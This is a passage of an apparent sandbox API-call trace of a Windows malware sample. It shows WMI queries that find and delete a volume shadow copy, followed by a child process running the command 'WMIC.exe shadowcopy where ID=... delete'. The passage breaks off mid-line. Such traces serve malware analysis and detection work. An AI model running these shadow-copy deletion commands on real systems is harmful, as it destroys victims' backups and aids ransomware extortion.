CoSetProxyBlanket (pProxy=0x1e53c18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0093.605] free (_Block=0x4acce0) [0093.605] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0093.605] ??0CHString@@QEAA@XZ () returned 0x16f8a0 [0093.605] GetCurrentThreadId () returned 0x9dc [0093.606] malloc (_Size=0x18) returned 0x4acce0 [0093.606] lstrlenA (lpString="") returned 0 [0093.606] malloc (_Size=0x2) returned 0x2fdfb0 [0093.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff26314c, cbMultiByte=-1, lpWideCharStr=0x2fdfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0093.606] free (_Block=0x2fdfb0) [0093.606] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'") returned 0x50 [0093.606] SysStringLen (param_1="") returned 0x0 [0093.606] free (_Block=0x4acce0) [0093.606] malloc (_Size=0x18) returned 0x4acce0 [0093.606] IWbemServices:ExecQuery (in: This=0x1e53c18, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy WHERE ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'", lFlags=0, pCtx=0x0, ppEnum=0x16f8a8 | out: ppEnum=0x16f8a8*=0x1e53d18) returned 0x0 [0093.694] free (_Block=0x4acce0) [0093.694] CoSetProxyBlanket (pProxy=0x1e53d18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0093.697] IEnumWbemClassObject:Next (in: This=0x1e53d18, lTimeout=-1, uCount=0x1, apObjects=0x16f8b0, puReturned=0x16f8c0 | out: apObjects=0x16f8b0*=0x1e53d80, puReturned=0x16f8c0*=0x1) returned 0x0 [0093.699] malloc (_Size=0x18) returned 0x4acce0 [0093.699] IWbemClassObject:Get (in: This=0x1e53d80, wszName="__PATH", lFlags=0, pVal=0x16f8d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f8d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0093.699] free (_Block=0x4acce0) [0093.699] malloc (_Size=0x800) returned 0x4ad080 [0093.699] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x4ad080, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0093.699] FormatMessageW (in: dwFlags=0x2500, lpSource=0x4ad080, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x16f7f8, nSize=0x0, Arguments=0x16f808 | out: lpBuffer="뚐'") returned 0x67 [0093.699] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0093.699] malloc (_Size=0x68) returned 0x4ad890 [0093.700] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x4ad890, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0093.700] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff2d2ab0 [0093.700] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0093.700] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0093.700] free (_Block=0x4ad890) [0093.700] free (_Block=0x4ad080) [0093.700] LocalFree (hMem=0x27b690) returned 0x0 [0093.701] IWbemServices:DeleteInstance (in: This=0x1e53c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0094.739] IUnknown:Release (This=0x1e53d80) returned 0x0 [0094.739] malloc (_Size=0x800) returned 0x4ad080 [0094.739] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x4ad080, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0094.739] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0094.739] malloc (_Size=0x20) returned 0x4acef0 [0094.739] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x4acef0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0094.739] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff2d2ab0 [0094.739] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0094.740] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0094.740] free (_Block=0x4acef0) [0094.740] free (_Block=0x4ad080) [0094.740] IEnumWbemClassObject:Next (in: This=0x1e53d18, lTimeout=-1, uCount=0x1, apObjects=0x16f8b0, puReturned=0x16f8c0 | out: apObjects=0x16f8b0*=0x0, puReturned=0x16f8c0*=0x0) returned 0x1 [0094.741] IUnknown:Release (This=0x1e53d18) returned 0x0 [0094.742] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0094.742] free (_Block=0x4acca0) [0094.742] free (_Block=0x4accc0) [0094.742] GetCurrentThreadId () returned 0x9dc [0094.742] ??0CHString@@QEAA@PEBG@Z () returned 0x16fa88 [0094.742] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x16fa88 [0094.742] lstrlenW (lpString="LIST") returned 4 [0094.742] lstrlenW (lpString="delete") returned 6 [0094.742] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0094.742] lstrlenW (lpString="ASSOC") returned 5 [0094.742] lstrlenW (lpString="delete") returned 6 [0094.743] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0094.743] lstrlenW (lpString="GET") returned 3 [0094.743] lstrlenW (lpString="delete") returned 6 [0094.743] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0094.743] ??1CHString@@QEAA@XZ () returned 0x753b4501 [0094.743] WbemLocator:IUnknown:Release (This=0x1e53c18) returned 0x0 [0094.743] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0094.743] _kbhit () returned 0x0 [0094.744] free (_Block=0x4a6f20) [0094.744] free (_Block=0x4acac0) [0094.744] free (_Block=0x4acaa0) [0094.744] free (_Block=0x4aca80) [0094.744] free (_Block=0x4aca60) [0094.744] free (_Block=0x4a70a0) [0094.744] free (_Block=0x4acb40) [0094.744] free (_Block=0x4a85c0) [0094.744] free (_Block=0x4ad020) [0094.744] free (_Block=0x4acbc0) [0094.744] free (_Block=0x4acfa0) [0094.744] free (_Block=0x4acae0) [0094.744] free (_Block=0x4acbe0) [0094.744] free (_Block=0x4a7140) [0094.744] free (_Block=0x4a6e00) [0094.744] free (_Block=0x4acff0) [0094.744] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0094.744] free (_Block=0x4ace20) [0094.744] free (_Block=0x4acb00) [0094.745] free (_Block=0x4acb20) [0094.745] free (_Block=0x4acf30) [0094.745] free (_Block=0x4acb60) [0094.745] free (_Block=0x4a7ee0) [0094.745] free (_Block=0x4a7f30) [0094.745] free (_Block=0x4a7f80) [0094.745] free (_Block=0x4acb80) [0094.745] free (_Block=0x4a6a20) [0094.745] free (_Block=0x4a6de0) [0094.745] free (_Block=0x4a8040) [0094.745] free (_Block=0x4a6dc0) [0094.745] free (_Block=0x4a8000) [0094.745] free (_Block=0x4a6d60) [0094.745] free (_Block=0x4a6d80) [0094.745] free (_Block=0x4a6c40) [0094.745] free (_Block=0x4a6c60) [0094.745] free (_Block=0x4a6be0) [0094.745] free (_Block=0x4a6c00) [0094.745] free (_Block=0x4a6ca0) [0094.745] free (_Block=0x4a6cc0) [0094.745] free (_Block=0x4a6d00) [0094.746] free (_Block=0x4a6d20) [0094.746] free (_Block=0x4a6b20) [0094.746] free (_Block=0x4a6b40) [0094.746] free (_Block=0x4a6ac0) [0094.746] free (_Block=0x4a6ae0) [0094.746] free (_Block=0x4a6b80) [0094.746] free (_Block=0x4a6ba0) [0094.746] free (_Block=0x4a6a60) [0094.746] free (_Block=0x4a6a80) [0094.746] free (_Block=0x4a69d0) [0094.746] free (_Block=0x4a69a0) [0094.746] free (_Block=0x4a6e90) [0094.746] WbemLocator:IUnknown:Release (This=0x1e41390) returned 0x2 [0094.746] WbemLocator:IUnknown:Release (This=0x1e53b28) returned 0x0 [0094.747] WbemLocator:IUnknown:Release (This=0x1e53a98) returned 0x0 [0094.747] WbemLocator:IUnknown:Release (This=0x1e41390) returned 0x1 [0094.747] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0094.747] WbemLocator:IUnknown:Release (This=0x1e41390) returned 0x0 [0094.747] free (_Block=0x4ac9e0) [0094.747] free (_Block=0x4aca00) [0094.747] free (_Block=0x4a8540) [0094.747] free (_Block=0x4aca20) [0094.747] free (_Block=0x4aca40) [0094.748] free (_Block=0x4a8580) [0094.748] free (_Block=0x4ac860) [0094.748] free (_Block=0x4ac880) [0094.748] free (_Block=0x4a83c0) [0094.748] free (_Block=0x4ac8a0) [0094.748] free (_Block=0x4ac8c0) [0094.748] free (_Block=0x4a8400) [0094.748] free (_Block=0x4ac7e0) [0094.748] free (_Block=0x4ac800) [0094.748] free (_Block=0x4a8340) [0094.748] free (_Block=0x4ac820) [0094.748] free (_Block=0x4ac840) [0094.748] free (_Block=0x4a8380) [0094.748] free (_Block=0x4ac960) [0094.748] free (_Block=0x4ac980) [0094.748] free (_Block=0x4a84c0) [0094.748] free (_Block=0x4ac9a0) [0094.748] free (_Block=0x4ac9c0) [0094.748] free (_Block=0x4a8500) [0094.748] free (_Block=0x4ac760) [0094.748] free (_Block=0x4ac780) [0094.748] free (_Block=0x4a82c0) [0094.749] free (_Block=0x4ac7a0) [0094.749] free (_Block=0x4ac7c0) [0094.749] free (_Block=0x4a8300) [0094.749] free (_Block=0x4ac8e0) [0094.749] free (_Block=0x4ac900) [0094.749] free (_Block=0x4a8440) [0094.749] free (_Block=0x4ac920) [0094.749] free (_Block=0x4ac940) [0094.749] free (_Block=0x4a8480) [0094.749] free (_Block=0x4ac6a0) [0094.749] free (_Block=0x4ac6c0) [0094.749] free (_Block=0x4a8200) [0094.749] free (_Block=0x4ac560) [0094.749] free (_Block=0x4ac580) [0094.749] free (_Block=0x4a80c0) [0094.749] free (_Block=0x4a6e50) [0094.749] free (_Block=0x4a6e70) [0094.749] free (_Block=0x4a8080) [0094.749] free (_Block=0x4ac5e0) [0094.749] free (_Block=0x4ac600) [0094.749] free (_Block=0x4a8140) [0094.749] free (_Block=0x4ac6e0) [0094.749] free (_Block=0x4ac700) [0094.750] free (_Block=0x4a8240) [0094.750] free (_Block=0x4ac5a0) [0094.750] free (_Block=0x4ac5c0) [0094.750] free (_Block=0x4a8100) [0094.750] free (_Block=0x4ac620) [0094.750] free (_Block=0x4ac640) [0094.750] free (_Block=0x4a8180) [0094.750] free (_Block=0x4ac660) [0094.750] free (_Block=0x4ac680) [0094.750] free (_Block=0x4a81c0) [0094.750] free (_Block=0x4ac720) [0094.750] free (_Block=0x4ac740) [0094.750] free (_Block=0x4a8280) [0094.750] CoUninitialize () [0094.777] exit (_Code=0) [0094.777] free (_Block=0x4acd30) [0094.777] free (_Block=0x4a7ea0) [0094.777] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0094.777] free (_Block=0x4a6f40) [0094.777] free (_Block=0x4a6a40) [0094.777] free (_Block=0x4a7e60) [0094.777] free (_Block=0x4a7e20) [0094.777] free (_Block=0x4a7dd0) [0094.777] free (_Block=0x4a7d90) [0094.777] free (_Block=0x4a7d30) [0094.777] free (_Block=0x4a5a90) [0094.777] free (_Block=0x4a5a50) [0094.777] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0094.777] free (_Block=0x4acec0) Thread: id = 138 os_tid = 0xa08 Thread: id = 139 os_tid = 0xa0c Thread: id = 140 os_tid = 0x780 Thread: id = 141 os_tid = 0x488 Thread: id = 142 os_tid = 0x408 Process: id = "18" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7a4ea000" os_pid = "0x270" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xaec" cmd_line = "cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 143 os_tid = 0xb3c [0094.865] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fb30 | out: lpSystemTimeAsFileTime=0x12fb30*(dwLowDateTime=0x40230ed0, dwHighDateTime=0x1d68245)) [0094.865] GetCurrentProcessId () returned 0x270 [0094.866] GetCurrentThreadId () returned 0xb3c [0094.866] GetTickCount () returned 0x114d74c [0094.866] QueryPerformanceCounter (in: lpPerformanceCount=0x12fb38 | out: lpPerformanceCount=0x12fb38*=21475870991) returned 1 [0094.868] GetModuleHandleW (lpModuleName=0x0) returned 0x49ec0000 [0094.868] __set_app_type (_Type=0x1) [0094.868] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49ee7810) returned 0x0 [0094.868] __getmainargs (in: _Argc=0x49f0a608, _Argv=0x49f0a618, _Env=0x49f0a610, _DoWildCard=0, _StartInfo=0x49eee0f4 | out: _Argc=0x49f0a608, _Argv=0x49f0a618, _Env=0x49f0a610) returned 0 [0094.868] GetCurrentThreadId () returned 0xb3c [0094.868] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb3c) returned 0x3c [0094.869] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0094.869] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0094.869] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0094.869] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0094.869] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fac8 | out: phkResult=0x12fac8*=0x0) returned 0x2 [0094.869] VirtualQuery (in: lpAddress=0x12fab0, lpBuffer=0x12fa30, dwLength=0x30 | out: lpBuffer=0x12fa30*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0094.869] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12fa30, dwLength=0x30 | out: lpBuffer=0x12fa30*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0094.869] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12fa30, dwLength=0x30 | out: lpBuffer=0x12fa30*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0094.869] VirtualQuery (in: lpAddress=0x34000, lpBuffer=0x12fa30, dwLength=0x30 | out: lpBuffer=0x12fa30*(BaseAddress=0x34000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0094.869] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12fa30, dwLength=0x30 | out: lpBuffer=0x12fa30*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30 [0094.869] GetConsoleOutputCP () returned 0x1b5 [0094.871] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49efbfe0 | out: lpCPInfo=0x49efbfe0) returned 1 [0094.872] SetConsoleCtrlHandler (HandlerRoutine=0x49ee3184, Add=1) returned 1 [0094.872] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.872] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0094.872] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.872] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49eee194 | out: lpMode=0x49eee194) returned 1 [0094.872] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.872] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0094.872] _get_osfhandle (_FileHandle=0) returned 0x3 [0094.872] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49eee198 | out: lpMode=0x49eee198) returned 1 [0094.873] _get_osfhandle (_FileHandle=0) returned 0x3 [0094.873] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0094.873] GetEnvironmentStringsW () returned 0x358b90* [0094.873] GetProcessHeap () returned 0x340000 [0094.873] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xa7c) returned 0x359620 [0094.873] FreeEnvironmentStringsW (penv=0x358b90) returned 1 [0094.873] GetProcessHeap () returned 0x340000 [0094.873] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x8) returned 0x358a10 [0094.873] GetEnvironmentStringsW () returned 0x358b90* [0094.873] GetProcessHeap () returned 0x340000 [0094.873] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xa7c) returned 0x35a0b0 [0094.873] FreeEnvironmentStringsW (penv=0x358b90) returned 1 [0094.873] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e988 | out: phkResult=0x12e988*=0x44) returned 0x0 [0094.873] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e980, lpData=0x12e9a0, lpcbData=0x12e984*=0x1000 | out: lpType=0x12e980*=0x0, lpData=0x12e9a0*=0x18, lpcbData=0x12e984*=0x1000) returned 0x2 [0094.874] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e980, lpData=0x12e9a0, lpcbData=0x12e984*=0x1000 | out: lpType=0x12e980*=0x4, lpData=0x12e9a0*=0x1, lpcbData=0x12e984*=0x4) returned 0x0 [0094.874] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e980, lpData=0x12e9a0, lpcbData=0x12e984*=0x1000 | out: lpType=0x12e980*=0x0, lpData=0x12e9a0*=0x1, lpcbData=0x12e984*=0x1000) returned 0x2 [0094.874] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e980, lpData=0x12e9a0, lpcbData=0x12e984*=0x1000 | out: lpType=0x12e980*=0x4, lpData=0x12e9a0*=0x0, lpcbData=0x12e984*=0x4) returned 0x0 [0094.874] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e980, lpData=0x12e9a0, lpcbData=0x12e984*=0x1000 | out: lpType=0x12e980*=0x4, lpData=0x12e9a0*=0x40, lpcbData=0x12e984*=0x4) returned 0x0 [0094.874] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e980, lpData=0x12e9a0, lpcbData=0x12e984*=0x1000 | out: lpType=0x12e980*=0x4, lpData=0x12e9a0*=0x40, lpcbData=0x12e984*=0x4) returned 0x0 [0094.874] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e980, lpData=0x12e9a0, lpcbData=0x12e984*=0x1000 | out: lpType=0x12e980*=0x0, lpData=0x12e9a0*=0x40, lpcbData=0x12e984*=0x1000) returned 0x2 [0094.874] RegCloseKey (hKey=0x44) returned 0x0 [0094.874] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e988 | out: phkResult=0x12e988*=0x44) returned 0x0 [0094.874] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e980, lpData=0x12e9a0, lpcbData=0x12e984*=0x1000 | out: lpType=0x12e980*=0x0, lpData=0x12e9a0*=0x40, lpcbData=0x12e984*=0x1000) returned 0x2 [0094.874] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e980, lpData=0x12e9a0, lpcbData=0x12e984*=0x1000 | out: lpType=0x12e980*=0x4, lpData=0x12e9a0*=0x1, lpcbData=0x12e984*=0x4) returned 0x0 [0094.874] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e980, lpData=0x12e9a0, lpcbData=0x12e984*=0x1000 | out: lpType=0x12e980*=0x0, lpData=0x12e9a0*=0x1, lpcbData=0x12e984*=0x1000) returned 0x2 [0094.874] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e980, lpData=0x12e9a0, lpcbData=0x12e984*=0x1000 | out: lpType=0x12e980*=0x4, lpData=0x12e9a0*=0x0, lpcbData=0x12e984*=0x4) returned 0x0 [0094.874] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e980, lpData=0x12e9a0, lpcbData=0x12e984*=0x1000 | out: lpType=0x12e980*=0x4, lpData=0x12e9a0*=0x9, lpcbData=0x12e984*=0x4) returned 0x0 [0094.874] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e980, lpData=0x12e9a0, lpcbData=0x12e984*=0x1000 | out: lpType=0x12e980*=0x4, lpData=0x12e9a0*=0x9, lpcbData=0x12e984*=0x4) returned 0x0 [0094.874] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e980, lpData=0x12e9a0, lpcbData=0x12e984*=0x1000 | out: lpType=0x12e980*=0x0, lpData=0x12e9a0*=0x9, lpcbData=0x12e984*=0x1000) returned 0x2 [0094.874] RegCloseKey (hKey=0x44) returned 0x0 [0094.874] time (in: timer=0x0 | out: timer=0x0) returned 0x5f517443 [0094.874] srand (_Seed=0x5f517443) [0094.874] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'\" delete" [0094.874] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'\" delete" [0094.875] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49efc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0094.875] GetProcessHeap () returned 0x340000 [0094.875] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x218) returned 0x35ab40 [0094.875] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x35ab50, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0094.875] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49eef360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0094.875] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49eef360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0094.875] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49eef360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0094.875] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0094.875] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0094.875] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0094.875] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0094.875] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0094.875] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0094.875] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0094.876] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0094.876] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0094.876] GetProcessHeap () returned 0x340000 [0094.876] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x359620 | out: hHeap=0x340000) returned 1 [0094.876] GetEnvironmentStringsW () returned 0x358b90* [0094.876] GetProcessHeap () returned 0x340000 [0094.876] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xa94) returned 0x35ad60 [0094.876] FreeEnvironmentStringsW (penv=0x358b90) returned 1 [0094.876] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49eef360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.876] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49eef360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0094.876] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0094.876] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0094.876] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0094.876] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0094.876] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0094.876] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0094.876] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0094.876] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0094.876] GetProcessHeap () returned 0x340000 [0094.876] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x5c) returned 0x35b800 [0094.877] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f790 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0094.877] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x12f790, lpFilePart=0x12f770 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x12f770*="Desktop") returned 0x25 [0094.877] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: 